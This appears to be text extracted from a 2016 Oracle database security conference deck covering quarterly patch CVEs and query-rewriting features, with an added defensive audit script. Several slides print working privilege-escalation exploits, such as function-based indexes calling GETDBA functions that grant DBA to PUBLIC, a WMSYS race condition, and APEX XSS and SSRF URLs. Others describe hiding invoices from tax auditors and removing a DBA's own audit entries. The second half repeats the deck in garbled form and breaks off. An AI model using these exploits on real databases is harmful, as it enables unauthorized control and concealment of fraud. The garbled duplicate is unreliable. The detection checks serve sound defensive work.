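JOIN   dba_objects  o ON o.owner = s.table_owner AND o.object_name = s.table_name
WHERE  s.owner = 'PUBLIC' AND s.synonym_name = 'DUAL';

-- 2. Public synonyms for DBA_* dictionary views that resolve outside SYS
SELECT synonym_name, table_owner, table_name
FROM   dba_synonyms
WHERE  owner = 'PUBLIC'
AND    synonym_name LIKE 'DBA\_%' ESCAPE '\'
AND    table_owner <> 'SYS';

-- 3. VPD policies: these append a where clause generated by the policy function
SELECT object_owner, object_name, policy_name, pf_owner, package, function, enable
FROM   dba_policies
ORDER  BY object_owner, object_name;

-- 4. Data Redaction policies: these rewrite result values per user/expression
SELECT p.object_owner, p.object_name, p.policy_name, p.expression, p.enable,
       c.column_name, c.function_type
FROM   redaction_policies p
JOIN   redaction_columns  c
       ON c.object_owner = p.object_owner AND c.object_name = p.object_name
ORDER  BY 1, 2;

-- 5. Who may bypass VPD or redaction (should be a very short list)
SELECT grantee, privilege
FROM   dba_sys_privs
WHERE  privilege IN ('EXEMPT ACCESS POLICY', 'EXEMPT REDACTION POLICY');

-- 6. SQL Translation Framework profiles and their registered rewrites (12c)
SELECT owner, profile_name, translator
FROM   dba_sql_translation_profiles;
SELECT owner, profile_name, sql_text, translated_text
FROM   dba_sql_translations;

-- 7. Is this session silently redirected to another schema?
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
FROM   sys.dual;

-- 8. Checksum the DDL of selected SYS views and compare with a stored baseline.
--    First run stores the baseline, later runs report CHANGED views.
CREATE TABLE view_baseline (
  owner     VARCHAR2(128),
  view_name VARCHAR2(128),
  sha256    RAW(32),
  CONSTRAINT view_baseline_pk PRIMARY KEY (owner, view_name));

DECLARE
  l_hash RAW(32);
  l_old  RAW(32);
  l_cnt  PLS_INTEGER;
BEGIN
  FOR v IN (SELECT owner, view_name
            FROM   dba_views
            WHERE  owner = 'SYS'
            AND    view_name IN ('DBA_AUDIT_TRAIL', 'DBA_USERS',
                                 'DBA_ROLE_PRIVS', 'DBA_SYS_PRIVS'))
  LOOP
    -- DBMS_METADATA returns the full CREATE VIEW text as a CLOB
    l_hash := DBMS_CRYPTO.HASH(DBMS_METADATA.GET_DDL('VIEW', v.view_name, v.owner),
                               DBMS_CRYPTO.HASH_SH256);
    SELECT COUNT(*) INTO l_cnt FROM view_baseline
    WHERE  owner = v.owner AND view_name = v.view_name;
    IF l_cnt = 0 THEN
      INSERT INTO view_baseline VALUES (v.owner, v.view_name, l_hash);
      DBMS_OUTPUT.PUT_LINE('baseline stored: ' || v.owner || '.' || v.view_name);
    ELSE
      SELECT sha256 INTO l_old FROM view_baseline
      WHERE  owner = v.owner AND view_name = v.view_name;
      IF l_old <> l_hash THEN
        DBMS_OUTPUT.PUT_LINE('CHANGED: ' || v.owner || '.' || v.view_name ||
                             ' sha256=' || RAWTOHEX(l_hash));
      ELSE
        DBMS_OUTPUT.PUT_LINE('ok: ' || v.owner || '.' || v.view_name);
      END IF;
    END IF;
  END LOOP;
  COMMIT;
END;
/
```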
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and Auditors/Security Department should be aware of powerful Oracle features which could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, …)
Migration to 12.2
More auditing projects
Integration of Auditing with SIEM solutions
Q & A
Thank you / Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jan 2016 CPU - CVE-2015-4921
http://www.davidlitchfield.com/DetailsforOraclesJanuary2016CPU.pdf
Problem: Status is incorrectly reported if SYS Auditing is used together with DB Vault
Reporter: David Litchfield
Jan 2016 CPU - CVE-2015-4925
http://www.davidlitchfield.com/DetailsforOraclesJanuary2016CPU.pdf
Problem: Privilege escalation via Race Condition in WMSYS.LT.COPYFORUPDATE
Reporter: David Litchfield
The Oracle Workspace Manager allows a user to version-enable database tables. This is achieved by creating workspaces which contain the versioned data. The Workspace Manager contains a number of PL/SQL packages that are used to manage workspaces. To function correctly, some management actions must be performed with higher privileges than a normal user might have, and so to enable this, some of the management functions execute with the privileges of the WMSYS user. The main workspace manager interface is the LT PL/SQL package, and this executes with the privileges of the user that calls or invokes LT. When privileged work is required to be executed, LT calls the LTADM package. The LTADM package executes with the privileges of the owner or definer, in this case WMSYS. WMSYS has a number of very powerful privileges, such as CREATE ANY TRIGGER, which allows the grantee to create a trigger in any schema with the exception of the SYS schema.
Jan 2016 CPU - CVE-2015-4925
SELECT COUNT(*) INTO CNT
FROM V$OPEN_CURSOR OC, V$SQL S, V$OBJECT_DEPENDENCY OD
WHERE OC.SID = USER_SID AND [...] AND OD.TO_TYPE IN (7, 8, 9, 11);
Here OD.TO_TYPEs 7, 8, 9 and 11 are functions, procedures, packages and objects. If any such dependency exists, then the user supplied query will not be executed and an error is raised:
IF (CNT > 0) THEN WMSYS.WM_ERROR.RAISEERROR(WMSYS.LT.WM_ERROR_81_NO); END IF;
SQL_STR2 := 'declare delstatuses wmsys.ltUtil.number_tab; begin select WM_delstatus bulk collect into delstatuses from '
  || WMSYS.LTUTIL.GETVN(TABLE_OWNER, TAB_NAME, '_BASE')
  || ' where WM_version = ' || CURVER || ' and ' || NEWWHERE_CLAUSE || ' for update; end;';
WMSYS.LTADM.EXECSQL(SQL_STR2);
Jan 2016 CPU - CVE-2015-4925
SQL> CONNECT RACER/PASSWORD
SQL> CREATE TABLE FOO(X NUMBER, CONSTRAINT X_PK PRIMARY KEY(X));
SQL> INSERT INTO FOO (X) VALUES (1);
SQL> COMMIT;
SQL> EXEC WMSYS.LT.ENABLEVERSIONING('FOO')
SQL> create or replace function Y return number authid current_user is
  pragma autonomous_transaction;
begin
  dbms_output.put_line('BANG');
  execute immediate 'create or replace procedure owned(p varchar) is begin execute immediate p; end;';
  execute immediate 'grant execute on owned to public';
  dbms_output.put_line(sys_context('userenv', 'current_user'));
  return 1;
end;
/
Jan 2016 CPU - CVE-2015-4925
SQL> GRANT EXECUTE ON Y TO PUBLIC;
SQL> CREATE TABLE RACER(Y NUMBER);
SQL> INSERT INTO RACER(Y) VALUES (1);
SQL> COMMIT;
SQL> create or replace procedure attempt_it is
begin
  execute immediate 'BEGIN WMSYS.LT.COPYFORUPDATE(''FOO'', ''X=LENGTH((SELECT 1 FROM RACER.RACER WHERE RACER.Y=1))''); END;';
exception when others then
  null;
end;
/
SQL> declare
  i number := 0;
begin
  for i in 1..1000 loop
    execute immediate 'alter table RACER.RACER rename column Y to Z';
    execute immediate 'alter table RACER.RACER rename column Z to Y';
  end loop;
end;
/
Jan 2016 CPU - CVE-2015-4925
SQL> DESC WMSYS.OWNED
PROCEDURE WMSYS.OWNED
 Argument Name   Type       In/Out   Default?
 P               VARCHAR2   IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 9.0)
1 OLAP (CVSS 7.8)
3 RDBMS Security (CVSS 5.9, 3.3, 3.3; 1 remote)
http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
Apr 2016 CPU - CVE-2016-0690
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: AUDIT NOT EXISTS fails to capture attempts to execute a procedure that does not exist, either because the user does not have the execute privilege on it or because the procedure does not exist. If a DBA wants to capture attempts to execute procedures where the user does not have the execute privilege, we must also add:
Reporter: David Litchfield
Exploit:
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU - CVE-2016-0691
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: If a missing (due to no execute privilege) function is within a SELECT query, the name of the function is not logged, but the name of the table in the query is.
Reporter: David Litchfield
Exploit: obvious, Create Java Source…
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 9.0)
1 JDBC (CVSS 8.1, remote)
1 Portable Clusterware (CVSS 7.5, remote)
1 Data Pump (CVSS 6.7)
2 APEX (CVSS 6.1, 5.8; 2 remote)
1 RDBMS Security (CVSS 5.3, remote)
1 DB Sharding (CVSS 4.4)
1 Database Vault (CVSS 3.4)
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
Jul 2016 CPU - CVE-2016-3448
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: The HTMLDB_UTIL PL/SQL package is vulnerable to an XSS flaw. To access it, the schema (APEX_050000) needs to be specified first, however, because the config file whitelists apex.
Reporter: David Litchfield
Exploit:
http://example.com/ords/apex_050000.htmldb_util.JSON_FROM_ARRAY?P_COLS=1&P_NAME01=XX%22%3E%3CH1%3EOops%3C/H1%3E&P_F01=Y&P_ROWS=1
Jul 2016 CPU - CVE-2016-3467
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: Apex 5 is vulnerable to a server side request forgery flaw, i.e. it can be made to connect to another web server and port regardless of whether allowed URLs have been configured. For example, the request below will connect to someotherserver on port and POST X as a payload. This can be used as a port scanning mechanism, used to attack systems protected by a firewall, etc.
Reporter: David Litchfield
Exploit:
http://example/ords/apex_050000.WWV_FLOW_WEBSERVICES_API.MAKE_REQUEST?P_URL=http://someotherserver:port&p_envelope=X
Apr 2016 CPU - CVE-2016-3488
Problem: The package dbms_gsm_common allows changing a database parameter without the admin privileges and without a restart.
Reporter: Bruno Cirone
Exploit:
exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY', 'TRUE')
Jul 2016 CPU - CVE-2016-3488
-- as SYS
SQL> select name, value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY   FALSE
-- as user GSMUSER
SQL> exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY', 'TRUE')
PL/SQL-Prozedur erfolgreich abgeschlossen.
-- as user SYS - re-run again after execution of the package
SQL> select name, value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY   TRUE
July 2016 CPU - CVE-2016-3484
Problem: SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter: Alexander Kornbrust
Problem (Details + Exploit later…)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;
July 2016 CPU - CVE-2016-3489
Problem: Privilege escalation via INDEX privilege and function based index (FBI)
Reporter: Alexander Kornbrust
July 2016 CPU - CVE-2016-3489
-- Oracle 11.2.0.4, as SYSTEM
SQL> select grantee, owner, table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = 'INDEX' AND GRANTEE != OWNER and owner='SYS';
GRANTEE   OWNER   TABLE_NAME
SYSTEM    SYS     INCEXP
SYSTEM    SYS     INCFIL
SYSTEM    SYS     INCVID
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on getdba to public;
July 2016 CPU - CVE-2016-3489
==> SYSTEM does not have access to the SYS.LINK$ table
SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges
==> also the execution of getdba throws an error
SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4
==> Now create an index on the table sys.incvid using a function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
Index created.
SQL> select count(*) from sys.link$;
COUNT(*)
----------
11
July 2016 CPU - CVE-2016-3489
-- Oracle 12.1.0.2 (SYSTEM no longer has INHERIT ANY PRIVILEGES)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA(1));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA(1))
FEHLER in Zeile 1:
ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1
-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX, and the SYSTEM user can use
-- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on wmsys.getdba to public;
-- now we create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
August 2016
Hackproofing Oracle's eBusiness Suite, by David Litchfield
Presentation + Supporting documents:
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf
September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE - DIGEST VERIFIER
Shown as an open problem at the DOAG 2015 presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2 / SHA-512 based algorithm.
The new T: password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA1-based hash (Oracle 11+).
The new algorithm is known and already implemented in some tools.
Remark: Microsoft Office 2013 is 10 times more time consuming to crack than the new Oracle PBKDF2.
Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a secret.
Secret = 'XDB'
and the hash will be MD5('XDB:tiger'),
stored in the spare4 column, starting with "H:" (the H hash).
Oct 2016 CPU - CVE-2016-5516
Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL, and as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from using the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege Escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust
sqlplus sysman_apm/rds@ora1
SQL> desc dba_users
ERROR:
ORA-04043: object "SYS"."DBA_USERS" does not exist
==> user does not have the privilege to access DBA_USERS
SQL> select * from user_sys_privs;
USERNAME      PRIVILEGE               ADM
SYSMAN_APM    UNLIMITED TABLESPACE    NO
SYSMAN_APM    CREATE VIEW             NO
SYSMAN_APM    CREATE ANY LIBRARY      NO
SYSMAN_APM    CREATE SEQUENCE         NO
SYSMAN_APM    CREATE TABLE            NO
SYSMAN_APM    CREATE LIBRARY          NO
SYSMAN_APM    CREATE ANY INDEX        NO
==> CREATE ANY LIBRARY privilege is granted to SYSMAN_APM
SQL> select * from user_role_privs;
USERNAME      GRANTED_ROLE   ADM   DEF   OS_
SYSMAN_APM    CONNECT        NO    YES   NO
SYSMAN_APM    RESOURCE       NO    YES   NO
==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant dba to public';
  COMMIT;
  RETURN FOO;
END;
/
==> Grant execute privileges to PUBLIC
SQL> grant execute on getdba to public;
==> Create an index on SYSTEM.HELP using a function based index (FBI). The function getdba is used for the function based index.
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));
==> Reconnect is necessary
SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';
GRANTEE   GRANTED_ROLE   ADM   DEF
PUBLIC    DBA            NO    YES
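Both CVE-2016-3489 and CVE-2016-5604 above rely on the same preconditions: an INDEX or CREATE ANY INDEX privilege on a table owned by a more privileged schema, and a function-based index whose expression calls an invoker-rights function owned by the attacker. As an added defender-side check (not from the original deck), the following SQL*Plus script lists those grants and flags existing function-based indexes on SYS/SYSTEM tables that were created by, or call code of, another schema. It assumes a DBA session on Oracle 11.2 or 12.1 and traditional (non-unified) auditing for the final AUDIT statement; the list of excluded grantees is constructed for the example.

```sql
-- Added check script, not part of the original deck. Assumes a DBA session on
-- Oracle 11.2/12.1; the grantee exclusion list is a constructed example.
SET SERVEROUTPUT ON

-- 1. INDEX object privilege on SYS/SYSTEM tables held by another user
--    (the precondition of CVE-2016-3489: SYSTEM held INDEX on SYS.INCVID)
SELECT grantee, owner, table_name, grantor
FROM   dba_tab_privs
WHERE  privilege = 'INDEX'
AND    owner IN ('SYS', 'SYSTEM')
AND    grantee <> owner
ORDER  BY grantee, table_name;

-- 2. System privileges that allow an index on a foreign table (CVE-2016-5604:
--    SYSMAN_APM held CREATE ANY INDEX), a function in a foreign schema, or
--    running invoker-rights code with the table owner's privileges
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege IN ('CREATE ANY INDEX', 'CREATE ANY PROCEDURE',
                     'INHERIT ANY PRIVILEGES')
AND    grantee NOT IN ('SYS', 'SYSTEM', 'DBA')        -- constructed exclusion list
ORDER  BY privilege, grantee;

-- 3. Function-based indexes on SYS/SYSTEM tables that were created by another
--    schema or whose expression calls a schema-qualified function owned by
--    someone other than the table owner (a GETDBA-style index shows up here).
--    COLUMN_EXPRESSION is a LONG, so the inspection is done in PL/SQL.
DECLARE
  l_expr   VARCHAR2(4000);
  l_schema VARCHAR2(128);
BEGIN
  FOR r IN (SELECT owner, index_name, table_owner, table_name
            FROM   dba_indexes
            WHERE  index_type LIKE 'FUNCTION-BASED%'
            AND    table_owner IN ('SYS', 'SYSTEM'))
  LOOP
    FOR x IN (SELECT column_expression
              FROM   dba_ind_expressions
              WHERE  index_owner = r.owner AND index_name = r.index_name)
    LOOP
      l_expr := x.column_expression;                  -- LONG to VARCHAR2
      -- first schema qualifier in a call such as "SYSTEM"."GETDBA"('AK')
      l_schema := REGEXP_SUBSTR(l_expr, '"([^"]+)"\."[^"]+"\s*\(', 1, 1, NULL, 1);
      IF r.owner <> r.table_owner
         OR (l_schema IS NOT NULL AND l_schema <> r.table_owner)
      THEN
        DBMS_OUTPUT.PUT_LINE('SUSPICIOUS FBI ' || r.owner || '.' || r.index_name
                             || ' on ' || r.table_owner || '.' || r.table_name
                             || ': ' || l_expr);
      END IF;
    END LOOP;
  END LOOP;
END;
/

-- 4. Record future CREATE/ALTER/DROP INDEX statements (traditional auditing)
AUDIT INDEX BY ACCESS;
```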
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
